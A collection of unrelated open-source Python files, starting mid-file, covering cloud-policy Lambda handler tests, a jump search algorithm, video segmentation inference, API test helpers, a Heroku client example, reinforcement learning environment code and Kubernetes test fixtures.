policy_config = {
'execution-options': {
'region': 'us-east-1',
'assume_role': 'arn:::',
'profile': 'dev',
'tracer': 'xray',
'account_id': '004',
'dryrun': True,
'cache': '/foobar.cache'},
'policies': [
{'mode': {
'type': 'period',
'schedule': "rate(1 minute)",
'execution-options': {
'metrics_enabled': True,
'assume_role': 'arn::::007:foo',
'output_dir': 's3://mybucket/output'}},
'resource': 'aws.ec2',
'name': 'check-dev'}
]}
self.assertEqual(
dict(handler.init_config(policy_config)),
{'assume_role': 'arn::::007:foo',
'metrics_enabled': 'aws',
'tracer': 'xray',
'account_id': '007',
'region': 'us-east-1',
'output_dir': 's3://mybucket/output',
# defaults
'external_id': None,
'dryrun': False,
'profile': None,
'authorization_file': None,
'cache': '',
'regions': (),
'cache_period': 0,
'log_group': None,
'metrics': None})
def setupLambdaEnv(
self, policy_data, environment=None, err_execs=(),
log_level=logging.INFO):
work_dir = self.change_cwd()
self.patch(handler, 'policy_data', None)
self.patch(handler, 'policy_config', None)
# don't require api creds to resolve account id
if 'execution-options' not in policy_data:
policy_data['execution-options'] = {'account_id': '007'}
elif 'account_id' not in policy_data['execution-options']:
policy_data['execution-options']['account_id'] = '007'
with open(os.path.join(work_dir, 'config.json'), 'w') as fh:
json.dump(policy_data, fh, indent=2)
output = self.capture_logging('custodian.lambda', level=log_level)
if environment:
self.change_environment(**environment)
policy_execution = []
validation_called = []
def validate(self):
validation_called.append(True)
def push(self, event, context):
policy_execution.append((event, context))
if err_execs:
raise err_execs.pop(0)
self.patch(Policy, "push", push)
self.patch(Policy, "validate", validate)
return output, policy_execution
def test_dispatch_log_event(self):
output, executions = self.setupLambdaEnv(
{'policies': [{'name': 'ec2', 'resource': 'ec2'}]},
{'C7N_DEBUG_EVENT': None},
log_level=logging.DEBUG)
handler.dispatch_event({'detail': {'resource': 'xyz'}}, {})
self.assertTrue('xyz' in output.getvalue())
self.patch(handler, 'C7N_DEBUG_EVENT', False)
handler.dispatch_event({'detail': {'resource': 'abc'}}, {})
self.assertFalse('abc' in output.getvalue())
self.assertTrue(executions)
@mock.patch('c7n.handler.PolicyCollection')
def test_dispatch_err_event(self, mock_collection):
output, executions = self.setupLambdaEnv({
'execution-options': {
'output_dir': 's3://xyz',
'account_id': '004'},
'policies': [{'resource': 'ec2', 'name': 'xyz'}]},
log_level=logging.DEBUG)
mock_collection.from_data.return_value = []
handler.dispatch_event({'detail': {'errorCode': 'unauthorized'}}, None)
self.assertTrue('Skipping failed operation: unauthorized' in output.getvalue())
self.patch(handler, 'C7N_SKIP_EVTERR', False)
handler.dispatch_event({'detail': {'errorCode': 'foi'}}, None)
self.assertFalse('Skipping failed operation: foi' in output.getvalue())
mock_collection.from_data.assert_called_once()
def test_dispatch_err_handle(self):
output, executions = self.setupLambdaEnv({
'execution-options': {'output_dir': 's3://xyz', 'account_id': '004'},
'policies': [{'resource': 'ec2', 'name': 'xyz'}]},
err_execs=[PolicyExecutionError("foo")] * 2)
self.assertRaises(
PolicyExecutionError,
handler.dispatch_event,
{'detail': {'xyz': 'oui'}}, None)
self.patch(handler, 'C7N_CATCH_ERR', True)
handler.dispatch_event({'detail': {'xyz': 'oui'}}, None)
self.assertEqual(output.getvalue().count('error during'), 2)
def test_handler(self):
output, executions = self.setupLambdaEnv({
'policies': [{
'resource': 'asg', 'name': 'auto'}]},
)
self.assertEqual(
handler.dispatch_event({"detail": {"errorCode": "404"}}, None), None
)
self.assertEqual(handler.dispatch_event({"detail": {}}, None), True)
self.assertEqual(executions, [({"detail": {}, "debug": True}, None)])
|
algorithms/Python/searching/jump_search.py | Tanmoy07tech/DSA | 247 | 12739545 | """
Jump search algorithm iterates through a sorted list with a step of n^(1/2),
until the element compared is bigger than the one searched.If the item is not
in the particular step, it shifts the entire step.
It will then perform a linear search on the step until it matches the target.
If not found, it returns -1.
Time Complexity: O(√n)
Space Complexity: O(1)
"""
import math
arr = [0, 1, 2, 8, 13, 17, 19, 25, 31, 32, 42]
target = 25
def jump_search(arr: list, x: int) -> int:
"""
>>> jump_search(arr, target) == (arr.index(target) if target in arr else -1)
True
"""
n = len(arr)
step = int(math.floor(math.sqrt(n)))
prev = 0
while arr[min(step, n) - 1] < x:
prev = step
step += int(math.floor(math.sqrt(n)))
if prev >= n:
return -1
while arr[prev] < x:
prev = prev + 1
if prev == min(step, n):
return -1
if arr[prev] == x:
return prev
return -1
def check_sort(test: list) -> bool:
"""checks whether the given list is sorted or not."""
if sorted(test) == test:
return True
else:
return False
if __name__ == "__main__":
if check_sort(arr):
res = jump_search(arr, target)
if res == -1:
print("Number not found!")
else:
print(f"Number {target} is at index {res}")
else:
print("Given list is not sorted!")
|
inference.py | OmkarThawakar/SeqFormer-1 | 223 | 12739582 | <reponame>OmkarThawakar/SeqFormer-1
'''
Inference code for SeqFormer
'''
import argparse
import datetime
import json
import random
import time
from pathlib import Path
import numpy as np
import torch
import datasets
import util.misc as utils
from models import build_model
import torchvision.transforms as T
import matplotlib.pyplot as plt
import os
from PIL import Image
import math
import torch.nn.functional as F
import json
import pycocotools.mask as mask_util
import sys
import cv2
def get_args_parser():
parser = argparse.ArgumentParser('Set transformer detector', add_help=False)
parser.add_argument('--lr', default=1e-4, type=float)
parser.add_argument('--lr_backbone', default=1e-5, type=float)
parser.add_argument('--batch_size', default=2, type=int)
parser.add_argument('--weight_decay', default=1e-4, type=float)
parser.add_argument('--epochs', default=150, type=int)
parser.add_argument('--lr_drop', default=100, type=int)
parser.add_argument('--clip_max_norm', default=0.1, type=float,
help='gradient clipping max norm')
parser.add_argument('--with_box_refine', default=True, action='store_true')
# Model parameters
parser.add_argument('--model_path', type=str, default=None,
help="Path to the model weights.")
# * Backbone
parser.add_argument('--backbone', default='resnet50', type=str,
help="Name of the convolutional backbone to use")
parser.add_argument('--dilation', action='store_true',
help="If true, we replace stride with dilation in the last convolutional block (DC5)")
parser.add_argument('--position_embedding', default='sine', type=str, choices=('sine', 'learned'),
help="Type of positional embedding to use on top of the image features")
parser.add_argument('--position_embedding_scale', default=2 * np.pi, type=float,
help="position / size * scale")
parser.add_argument('--num_feature_levels', default=4, type=int, help='number of feature levels')
# * Transformer
parser.add_argument('--enc_layers', default=6, type=int,
help="Number of encoding layers in the transformer")
parser.add_argument('--dec_layers', default=6, type=int,
help="Number of decoding layers in the transformer")
parser.add_argument('--dim_feedforward', default=1024, type=int,
help="Intermediate size of the feedforward layers in the transformer blocks")
parser.add_argument('--hidden_dim', default=256, type=int,
help="Size of the embeddings (dimension of the transformer)")
parser.add_argument('--dropout', default=0.1, type=float,
help="Dropout applied in the transformer")
parser.add_argument('--nheads', default=8, type=int,
help="Number of attention heads inside the transformer's attentions")
parser.add_argument('--num_queries', default=300, type=int,
help="Number of query slots")
parser.add_argument('--dec_n_points', default=4, type=int)
parser.add_argument('--enc_n_points', default=4, type=int)
parser.add_argument('--rel_coord', default=True, action='store_true')
# Segmentation
parser.add_argument('--masks', action='store_true',
help="Train segmentation head if the flag is provided")
parser.add_argument('--mask_out_stride', default=4, type=int)
# Loss
parser.add_argument('--no_aux_loss', dest='aux_loss', action='store_false',
help="Disables auxiliary decoding losses (loss at each layer)")
# * Matcher
parser.add_argument('--set_cost_class', default=1, type=float,
help="Class coefficient in the matching cost")
parser.add_argument('--set_cost_bbox', default=5, type=float,
help="L1 box coefficient in the matching cost")
parser.add_argument('--set_cost_giou', default=2, type=float,
help="giou box coefficient in the matching cost")
# * Loss coefficients
parser.add_argument('--mask_loss_coef', default=2, type=float)
parser.add_argument('--dice_loss_coef', default=5, type=float)
parser.add_argument('--cls_loss_coef', default=2, type=float)
parser.add_argument('--bbox_loss_coef', default=5, type=float)
parser.add_argument('--giou_loss_coef', default=2, type=float)
parser.add_argument('--focal_alpha', default=0.25, type=float)
# dataset parameters
parser.add_argument('--img_path', default='../ytvis/val/JPEGImages/')
parser.add_argument('--ann_path', default='../ytvis/annotations/instances_val_sub.json')
parser.add_argument('--save_path', default='results.json')
parser.add_argument('--dataset_file', default='YoutubeVIS')
parser.add_argument('--coco_path', type=str)
parser.add_argument('--coco_panoptic_path', type=str)
parser.add_argument('--remove_difficult', action='store_true')
parser.add_argument('--output_dir', default='output_ytvos',
help='path where to save, empty for no saving')
parser.add_argument('--device', default='cuda',
help='device to use for training / testing')
parser.add_argument('--seed', default=42, type=int)
parser.add_argument('--resume', default='', help='resume from checkpoint')
parser.add_argument('--start_epoch', default=0, type=int, metavar='N',
help='start epoch')
#parser.add_argument('--eval', action='store_true')
parser.add_argument('--eval', action='store_false')
parser.add_argument('--num_workers', default=0, type=int)
parser.add_argument('--num_frames', default=1, type=int, help='number of frames')
# distributed training parameters
parser.add_argument('--world_size', default=1, type=int,
help='number of distributed processes')
parser.add_argument('--dist_url', default='env://', help='url used to set up distributed training')
return parser
CLASSES=['person','giant_panda','lizard','parrot','skateboard','sedan','ape',
'dog','snake','monkey','hand','rabbit','duck','cat','cow','fish',
'train','horse','turtle','bear','motorbike','giraffe','leopard',
'fox','deer','owl','surfboard','airplane','truck','zebra','tiger',
'elephant','snowboard','boat','shark','mouse','frog','eagle','earless_seal',
'tennis_racket']
transform = T.Compose([
T.Resize(360),
T.ToTensor(),
T.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
def main(args):
device = torch.device(args.device)
# fix the seed for reproducibility
seed = args.seed + utils.get_rank()
torch.manual_seed(seed)
np.random.seed(seed)
random.seed(seed)
with torch.no_grad():
model, criterion, postprocessors = build_model(args)
model.to(device)
state_dict = torch.load(args.model_path)['model']
model.load_state_dict(state_dict)
model.eval()
folder = args.img_path
videos = json.load(open(args.ann_path,'rb'))['videos']#[:5]
# videos = [videos[1],videos[8],videos[22],videos[34]]
vis_num = len(videos)
# postprocess = PostProcessSegm_ifc()
result = []
for i in range(vis_num):
print("Process video: ",i)
id_ = videos[i]['id']
vid_len = videos[i]['length']
file_names = videos[i]['file_names']
video_name_len = 10
pred_masks = None
pred_logits = None
img_set=[]
for k in range(vid_len):
im = Image.open(os.path.join(folder,file_names[k]))
w, h = im.size
sizes = torch.as_tensor([int(h), int(w)])
img_set.append(transform(im).unsqueeze(0).cuda())
img = torch.cat(img_set,0)
model.detr.num_frames=vid_len
outputs = model.inference(img,img.shape[-1],img.shape[-2])
logits = outputs['pred_logits'][0]
output_mask = outputs['pred_masks'][0]
output_boxes = outputs['pred_boxes'][0]
H = output_mask.shape[-2]
W = output_mask.shape[-1]
scores = logits.sigmoid().cpu().detach().numpy()
hit_dict={}
topkv, indices10 = torch.topk(logits.sigmoid().cpu().detach().flatten(0),k=10)
indices10 = indices10.tolist()
for idx in indices10:
queryid = idx//42
if queryid in hit_dict.keys():
hit_dict[queryid].append(idx%42)
else:
hit_dict[queryid]= [idx%42]
for inst_id in hit_dict.keys():
masks = output_mask[inst_id]
pred_masks =F.interpolate(masks[:,None,:,:], (im.size[1],im.size[0]),mode="bilinear")
pred_masks = pred_masks.sigmoid().cpu().detach().numpy()>0.5 #shape [100, 36, 720, 1280]
if pred_masks.max()==0:
print('skip')
continue
for class_id in hit_dict[inst_id]:
category_id = class_id
score = scores[inst_id,class_id]
# print('name:',CLASSES[category_id-1],', score',score)
instance = {'video_id':id_, 'video_name': file_names[0][:video_name_len], 'score': float(score), 'category_id': int(category_id)}
segmentation = []
for n in range(vid_len):
if score < 0.001:
segmentation.append(None)
else:
mask = (pred_masks[n,0]).astype(np.uint8)
rle = mask_util.encode(np.array(mask[:,:,np.newaxis], order='F'))[0]
rle["counts"] = rle["counts"].decode("utf-8")
segmentation.append(rle)
instance['segmentations'] = segmentation
result.append(instance)
with open(args.save_path, 'w', encoding='utf-8') as f:
json.dump(result,f)
if __name__ == '__main__':
parser = argparse.ArgumentParser(' inference script', parents=[get_args_parser()])
args = parser.parse_args()
main(args)
|
gabbi/tests/test_replacers.py | scottwallacesh/gabbi | 145 | 12739615 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A place to put test of the replacers.
"""
import os
import unittest
from gabbi import case
from gabbi import exception
class EnvironReplaceTest(unittest.TestCase):
def test_environ_boolean(self):
"""Environment variables are always strings
That doesn't always suit our purposes, so test that "True"
and "False" become booleans as a special case.
"""
http_case = case.HTTPTestCase('test_request')
message = "$ENVIRON['moo']"
os.environ['moo'] = "True"
self.assertEqual(True, http_case._environ_replace(message))
os.environ['moo'] = "False"
self.assertEqual(False, http_case._environ_replace(message))
os.environ['moo'] = "true"
self.assertEqual(True, http_case._environ_replace(message))
os.environ['moo'] = "faLse"
self.assertEqual(False, http_case._environ_replace(message))
os.environ['moo'] = "null"
self.assertEqual(None, http_case._environ_replace(message))
os.environ['moo'] = "1"
self.assertEqual(1, http_case._environ_replace(message))
os.environ['moo'] = "cow"
self.assertEqual("cow", http_case._environ_replace(message))
message = '$ENVIRON["moo"]'
os.environ['moo'] = "True"
self.assertEqual(True, http_case._environ_replace(message))
class TestReplaceHeaders(unittest.TestCase):
def test_empty_headers(self):
"""A None value in headers should cause a GabbiFormatError."""
http_case = case.HTTPTestCase('test_request')
self.assertRaises(
exception.GabbiFormatError,
http_case._replace_headers_template, 'foo', None)
|
examples/basic_functionality.py | AkBotZ/heroku3.py | 109 | 12739638 | # coding=utf-8
import os
from pprint import pprint # noqa
# Third party libraries
import heroku3
# import socket
# import httplib
# import logging
# httplib.HTTPConnection.debuglevel = 1
# logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from requests
# logging.getLogger().setLevel(logging.INFO)
# requests_log = logging.getLogger("requests.packages.urllib3")
# requests_log.setLevel(logging.INFO)
# requests_log.propagate = True
HEROKU_API_KEY = os.environ.get("HEROKU_API_KEY", False)
HEROKU_APPNAME = os.environ.get("HEROKU_APPNAME", False)
TEST_EMAIL = os.environ.get("TEST_EMAIL", False)
heroku_conn = heroku3.from_key(HEROKU_API_KEY)
# app = heroku_conn.create_app(name='testy2124app', stack_id_or_name='cedar', region_id_or_name='us')
# print(app.addons())
# print(heroku_conn.addons('testy123app'))
# for addon in app.addons():
# addon.delete()
# del config['TEST1']
# del config['TEST2']
# del config['TEST3']
# del config['Z01']
# del config['Z02']
# print(config)
# config['TEST1'] = u'MM1'
# config['TEST2'] = u'MM2'
# config['TEST3'] = u'MM3'
# config2 = heroku_conn.update_appconfig('testy123app', {u'Z01': u'A1', u'Z02': u'A2'})
# config2 = config.update({u'Z01': u'A1', u'Z02': u'A2'})
# config3 = app.config()
# print(config)
# print("======")
# print(config2)
# print("======")
# print(config3)
# print(config['TEST1'])
# print(config['TEST3'])
# app = heroku_conn.app('kdsjhkszdjhgksjdhfkj')
# procs = app.process_formation()
# proc = app.process_formation()['web']
# print(proc.size)
# print(proc.quantity)
# print(procs)
# proc.scale(0)
# app.scale_formation_process('web', 1)
# output = app.run_command('pgbackups:url')
# collab = app.add_collaborator(email=TEST_EMAIL, silent=False)
# collab = app.remove_collaborator(TEST_EMAIL)
# print(newapp.collaborators())
# config = newapp.config()
# config['TEST2'] = None
# print(newapp.domains())
# domain2 = newapp.add_domain('testy123.testing.com')
# print(newapp.domains())
# newapp.remove_domain('testy123.testing.com')
# domain.remove()
# print(newapp.domains())
# app = heroku_conn.app(HEROKU_APPNAME)
# pprint(app.addons())
# dynos = app.dynos()
# dyno = dynos['web.1']
# print(dyno)
# releases = app.releases(sort='asc')
# for release in releases:
# print("{0} {1} {2} {3}".format(release.id, release.commit, release.user, release.description))
# releases = app.releases()._items.reverse()
# print(releases.pop())
# print(releases.pop())
# app.rollback('v108')
# apps = heroku_conn.apps(order_by='name', limit=1, sort='asc')
# apps = heroku_conn.apps(order_by='name', limit=1)
apps = heroku_conn.apps(order_by="name", sort="asc")
for app in apps:
print(app.name)
# app.rename('testy223')
# print(app.enable_maintenance_mode())
# print(app.disable_maintenance_mode())
# app.enable_feature('user-env-compile')
# app.disable_feature('user-env-compile')
# print(app.labs())
# print(heroku_conn.features())
# domain = app.add_domain('test123-1.testing.com')
# domain = app.add_domain('test123-2.testing.com')
# domain = app.add_domain('test123-3.testing.com')
# domain = app.add_domain('test123-4.testing.com')
# domain = app.add_domain('test123-5.testing.com')
# domain = app.add_domain('test123-6.testing.com')
# domain = app.add_domain('test123-7.testing.com')
# iterator = app.stream_log(lines=1)
# for line in iterator:
# filter out keep-alive new lines
# if line:
# print("{0}".format(line))
# logs = app.get_log(lines=100)
# print(logs)
# print(app.domains(limit=1))
# dyno = app.run_command('fab -l', printout=True)
# dyno.remove()
# proc = heroku_conn.apps()['testy123app'].process_formation()['web']
# print(proc.size)
# print(proc.quantity)
# formations = app.process_formation()
# print(formations['web'])
# for formation in formations:
# formation.resize(1)
# print(app._h._last_request_id)
# print(app.dynos()['web.1'])
# print(dynos['web.1'])
# print(heroku_conn.apps()['testy123app'])
# print(heroku_conn.apps()['d32b74d8-f5cf-4e3e-95dd-a601668fdb0c'])
# for dyno in app.dynos():
# print(dyno)
# print(dyno.command)
# dyno.restart()
# app.restart()
# del config['TEST2']
# newapp.remove_collaborator('<EMAIL>')
# collab.remove()
# pprint(newapp.addons)
# app = heroku_conn.app('testy123app')
# for addon in app.addons:
# print(addon.app.name, " - ", addon.plan.name)
# addons = heroku_conn.addon_services()
# pprint(addons)
# pg_addon = heroku_conn.addon_services('6235c964-8b3c-47e0-952f-8d8f6a2d53f5')
# pg_addon = heroku_conn.addon_services(id_or_name='heroku-postgresql')
# pprint(pg_addon)
# for addon in addons:
# print(addon.name, " - ", addon.id, " - ", addon.id, " - ", addon.price)
# addon.upgrade(plan_id_or_name='heroku-postgresql:basic')
# addon.delete()
# buildpack_urls = [
# 'https://github.com/some/buildpack', 'https://github.com/another/buildpack'
# ]
# app.update_buildpacks([buildpack_urls])
# buildpack_urls can also be empty. This clears all buildpacks:
# app.update_buildpacks([])
# app.delete()
print(heroku_conn._last_request_id)
|
docs/tutorials_torch/action_recognition/extract_feat.py | Kh4L/gluon-cv | 5,447 | 12739641 | """3. Extracting video features from pre-trained models
=======================================================
Feature extraction is a very useful tool when you don't have large annotated dataset or don't have the
computing resources to train a model from scratch for your use case. It's also useful to visualize what the model have learned.
In this tutorial, we provide a simple unified solution.
The only thing you need to prepare is a text file containing the information of your videos (e.g., the path to your videos),
we will take care of the rest.
You can extract strong video features from many popular pre-trained models in the GluonCV video model zoo using a single command line.
.. note::
Feel free to skip the tutorial because the feature extraction script is self-complete and ready to launch.
:download:`Download Full Python Script: feat_extract_pytorch.py<../../../scripts/action-recognition/feat_extract_pytorch.py>`
Please checkout the `model_zoo <../model_zoo/index.html#action_recognition>`_ to select your preferred pretrained model.
``python feat_extract_pytorch.py --config-file CONFIG``
"""
######################################################################
# Prepare Data
# ------------
#
# Your data can be stored in any hierarchy.
# Just use the format we adopt for training models in the previous tutorial and save the data annotation file as ``video.txt``.
# ::
#
# /home/ubuntu/your_data/video_001.mp4 200 0
# /home/ubuntu/your_data/video_001.mp4 300 1
# /home/ubuntu/your_data/video_002.mp4 100 2
# /home/ubuntu/your_data/video_003.mp4 400 2
# /home/ubuntu/your_data/video_004.mp4 200 1
# ......
# /home/ubuntu/your_data/video_100.mp4.100 3
#
# Each line has three things, the path to each video, the number of video frames and the video label.
# However, the second and third things are not gonna used in the code, they are just a placeholder.
# So you can put any postive number in these two places.
#
# Note that, at this moment, we only support extracting features from videos directly.
######################################################################
# Once you prepare the ``video.txt``, you can start extracting feature by:
#
# ::
#
# python feat_extract_pytorch.py --config-file ./scripts/action-recognition/configuration/i3d_resnet50_v1_feat.yaml
######################################################################
# The extracted features will be saved to a directory defined in the config file. Each video will have one feature file.
# For example, ``video_001.mp4`` will have a feature named ``i3d_resnet50_v1_kinetics400_video_001_feat.npy``.
# The feature is extracted from the center of the video by using a 32-frames clip.
######################################################################
# There are many other options and other models you can choose,
# e.g., `resnet50_v1b_feat.yaml <https://raw.githubusercontent.com/dmlc/gluon-cv/master/scripts/action-recognition/configuration/resnet50_v1b_feat.yaml>`_,
# `slowfast_4x16_resnet50_feat.yaml <https://raw.githubusercontent.com/dmlc/gluon-cv/master/scripts/action-recognition/configuration/slowfast_4x16_resnet50_feat.yaml>`_,
# `tpn_resnet50_f32s2_feat.yaml <https://raw.githubusercontent.com/dmlc/gluon-cv/master/scripts/action-recognition/configuration/tpn_resnet50_f32s2_feat.yaml>`_,
# `r2plus1d_v1_resnet50_feat.yaml <https://raw.githubusercontent.com/dmlc/gluon-cv/master/scripts/action-recognition/configuration/r2plus1d_v1_resnet50_feat.yaml>`_,
# `i3d_slow_resnet50_f32s2_feat.yaml <https://raw.githubusercontent.com/dmlc/gluon-cv/master/scripts/action-recognition/configuration/i3d_slow_resnet50_f32s2_feat.yaml>`_.
# Try extracting features from these SOTA video models on your own dataset and see which one performs better.
|
dizoo/gym_hybrid/envs/gym_hybrid_env.py | puyuan1996/DI-engine | 464 | 12739650 | from typing import Any, List, Dict, Union, Optional
import time
import gym
import gym_hybrid
import copy
import numpy as np
from easydict import EasyDict
from ding.envs import BaseEnv, BaseEnvTimestep, BaseEnvInfo
from ding.envs.common import EnvElementInfo, affine_transform
from ding.torch_utils import to_ndarray, to_list
from ding.utils import ENV_REGISTRY
@ENV_REGISTRY.register('gym_hybrid')
class GymHybridEnv(BaseEnv):
default_env_id = ['Sliding-v0', 'Moving-v0']
def __init__(self, cfg: EasyDict) -> None:
self._cfg = cfg
self._env_id = cfg.env_id
assert self._env_id in self.default_env_id
self._act_scale = cfg.act_scale
self._init_flag = False
self._replay_path = None
def reset(self) -> np.ndarray:
if not self._init_flag:
self._env = gym.make(self._env_id)
if self._replay_path is not None:
self._env = gym.wrappers.Monitor(
self._env, self._replay_path, video_callable=lambda episode_id: True, force=True
)
self._env.metadata["render.modes"] = ["human", "rgb_array"]
self._init_flag = True
if hasattr(self, '_seed') and hasattr(self, '_dynamic_seed') and self._dynamic_seed:
np_seed = 100 * np.random.randint(1, 1000)
self._env.seed(self._seed + np_seed)
elif hasattr(self, '_seed'):
self._env.seed(self._seed)
self._final_eval_reward = 0
obs = self._env.reset()
obs = to_ndarray(obs).astype(np.float32)
return obs
def close(self) -> None:
if self._init_flag:
self._env.close()
self._init_flag = False
def seed(self, seed: int, dynamic_seed: bool = True) -> None:
self._seed = seed
self._dynamic_seed = dynamic_seed
np.random.seed(self._seed)
def step(self, action: Dict) -> BaseEnvTimestep:
if self._act_scale:
# acceleration_value.
action['action_args'][0] = affine_transform(action['action_args'][0], min_val=0, max_val=1)
# rotation_value. Following line can be omitted, because in the affine_transform function,
# we have already done the clip(-1,1) operation
action['action_args'][1] = affine_transform(action['action_args'][1], min_val=-1, max_val=1)
action = [action['action_type'], action['action_args']]
obs, rew, done, info = self._env.step(action)
self._final_eval_reward += rew
if done:
info['final_eval_reward'] = self._final_eval_reward
obs = to_ndarray(obs)
if isinstance(obs, list): # corner case
for i in range(len(obs)):
if len(obs[i].shape) == 0:
obs[i] = np.array([obs[i]])
obs = np.concatenate(obs)
assert isinstance(obs, np.ndarray) and obs.shape == (10, )
obs = obs.astype(np.float32)
rew = to_ndarray([rew]) # wrapped to be transfered to a numpy array with shape (1,)
if isinstance(rew, list):
rew = rew[0]
assert isinstance(rew, np.ndarray) and rew.shape == (1, )
info['action_args_mask'] = np.array([[1, 0], [0, 1], [0, 0]])
return BaseEnvTimestep(obs, rew, done, info)
def get_random_action(self) -> Dict:
# action_type: 0, 1, 2
# action_args:
# - acceleration_value: [0, 1]
# - rotation_value: [-1, 1]
raw_action = self._env.action_space.sample()
return {'action_type': raw_action[0], 'action_args': raw_action[1]}
def info(self) -> BaseEnvInfo:
T = EnvElementInfo
return BaseEnvInfo(
agent_num=1,
obs_space=T(
(10, ),
{
'min': -1,
'max': 2,
'dtype': np.float32,
},
),
# [min, max)
act_space=T(
(3, ),
{
'min': 0,
'max': 3,
'dtype': int,
},
),
rew_space=T(
(1, ),
{
'min': -1.0,
'max': 1.0
},
),
use_wrappers=None,
)
def __repr__(self) -> str:
return "DI-engine gym hybrid Env"
def enable_save_replay(self, replay_path: Optional[str] = None) -> None:
if replay_path is None:
replay_path = './video'
self._replay_path = replay_path
|
examples/sklearn_job.py | kpavel/lithops | 158 | 12739656 | <gh_stars>100-1000
import numpy as np
import joblib
from lithops.util.joblib import register_lithops
from lithops.utils import setup_lithops_logger
from sklearn.datasets import load_digits
from sklearn.model_selection import RandomizedSearchCV
from sklearn.svm import SVC
digits = load_digits()
param_space = {
'C': np.logspace(-6, 6, 30),
'gamma': np.logspace(-8, 8, 30),
'tol': np.logspace(-4, -1, 30),
'class_weight': [None, 'balanced'],
}
model = SVC(kernel='rbf')
search = RandomizedSearchCV(model, param_space, cv=2, n_iter=50, verbose=10)
register_lithops()
setup_lithops_logger('INFO')
with joblib.parallel_backend('lithops'):
search.fit(digits.data, digits.target)
|
tests/models/test_bce_surv.py | rohanshad/pycox | 449 | 12739661 | import pytest
from pycox.models import BCESurv
import torchtuples as tt
from utils_model_testing import make_dataset, fit_model, assert_survs
@pytest.mark.parametrize('numpy', [True, False])
@pytest.mark.parametrize('num_durations', [2, 5])
def test_pmf_runs(numpy, num_durations):
data = make_dataset(True)
input, target = data
labtrans = BCESurv.label_transform(num_durations)
target = labtrans.fit_transform(*target)
data = tt.tuplefy(input, target)
if not numpy:
data = data.to_tensor()
net = tt.practical.MLPVanilla(input.shape[1], [4], labtrans.out_features)
model = BCESurv(net)
fit_model(data, model)
assert_survs(input, model)
model.duration_index = labtrans.cuts
assert_survs(input, model)
cdi = model.interpolate(3, 'const_pdf')
assert_survs(input, cdi)
|
integration_tests/test_suites/k8s-integration-test-suite/conftest.py | makotonium/dagster | 4,606 | 12739673 | <filename>integration_tests/test_suites/k8s-integration-test-suite/conftest.py
# pylint: disable=unused-import
import os
import tempfile
import docker
import kubernetes
import pytest
from dagster.core.instance import DagsterInstance
from dagster_k8s.launcher import K8sRunLauncher
from dagster_k8s_test_infra.cluster import (
dagster_instance_for_k8s_run_launcher,
define_cluster_provider_fixture,
helm_postgres_url_for_k8s_run_launcher,
)
from dagster_k8s_test_infra.helm import (
TEST_AWS_CONFIGMAP_NAME,
TEST_IMAGE_PULL_SECRET_NAME,
TEST_SECRET_NAME,
TEST_VOLUME_CONFIGMAP_NAME,
)
from dagster_k8s_test_infra.integration_utils import image_pull_policy
from dagster_test.test_project import build_and_tag_test_image, get_test_project_docker_image
pytest_plugins = ["dagster_k8s_test_infra.helm"]
IS_BUILDKITE = os.getenv("BUILDKITE") is not None
@pytest.fixture(scope="session", autouse=True)
def dagster_home():
old_env = os.getenv("DAGSTER_HOME")
os.environ["DAGSTER_HOME"] = "/opt/dagster/dagster_home"
yield
if old_env is not None:
os.environ["DAGSTER_HOME"] = old_env
cluster_provider = define_cluster_provider_fixture(
additional_kind_images=["docker.io/bitnami/rabbitmq", "docker.io/bitnami/postgresql"]
)
@pytest.yield_fixture
def schedule_tempdir():
with tempfile.TemporaryDirectory() as tempdir:
yield tempdir
@pytest.fixture()
def run_launcher(
cluster_provider, helm_namespace_for_k8s_run_launcher
): # pylint: disable=redefined-outer-name,unused-argument
return K8sRunLauncher(
image_pull_secrets=[{"name": TEST_IMAGE_PULL_SECRET_NAME}],
service_account_name="dagit-admin",
instance_config_map="dagster-instance",
postgres_password_secret="<PASSWORD>",
dagster_home="/opt/dagster/dagster_home",
job_image=get_test_project_docker_image(),
load_incluster_config=False,
kubeconfig_file=cluster_provider.kubeconfig_file,
image_pull_policy=image_pull_policy(),
job_namespace=helm_namespace_for_k8s_run_launcher,
env_config_maps=["dagster-pipeline-env", "test-env-configmap"]
+ ([TEST_AWS_CONFIGMAP_NAME] if not IS_BUILDKITE else []),
env_secrets=["test-env-secret"],
volume_mounts=[
{
"name": "test-volume",
"mountPath": "/opt/dagster/test_mount_path/volume_mounted_file.yaml",
"subPath": "volume_mounted_file.yaml",
}
],
volumes=[{"name": "test-volume", "configMap": {"name": TEST_VOLUME_CONFIGMAP_NAME}}],
)
@pytest.fixture(scope="session")
def dagster_docker_image():
docker_image = get_test_project_docker_image()
if not IS_BUILDKITE:
try:
client = docker.from_env()
client.images.get(docker_image)
print( # pylint: disable=print-call
"Found existing image tagged {image}, skipping image build. To rebuild, first run: "
"docker rmi {image}".format(image=docker_image)
)
except docker.errors.ImageNotFound:
build_and_tag_test_image(docker_image)
return docker_image
# See: https://stackoverflow.com/a/31526934/324449
def pytest_addoption(parser):
# We catch the ValueError to support cases where we are loading multiple test suites, e.g., in
# the VSCode test explorer. When pytest tries to add an option twice, we get, e.g.
#
# ValueError: option names {'--cluster-provider'} already added
# Use kind or some other cluster provider?
try:
parser.addoption("--cluster-provider", action="store", default="kind")
except ValueError:
pass
# Specify an existing kind cluster name to use
try:
parser.addoption("--kind-cluster", action="store")
except ValueError:
pass
# Keep resources around after tests are done
try:
parser.addoption("--no-cleanup", action="store_true", default=False)
except ValueError:
pass
# Use existing Helm chart/namespace
try:
parser.addoption("--existing-helm-namespace", action="store")
except ValueError:
pass
|
libtbx/tst_containers.py | rimmartin/cctbx_project | 155 | 12739687 | <reponame>rimmartin/cctbx_project
from __future__ import absolute_import, division, print_function
def exercise_oset():
from libtbx.containers import OrderedSet as oset
o = oset()
assert repr(o) == "OrderedSet()"
assert len(o) == 0
o = oset([3,5,2,5,4,2,1])
assert list(o) == [3, 5, 2, 4, 1]
assert 3 in o
assert 6 not in o
o.add(3)
assert len(o) == 5
o.add(6)
assert 6 in o
assert list(reversed(o)) == [6,1,4,2,5,3]
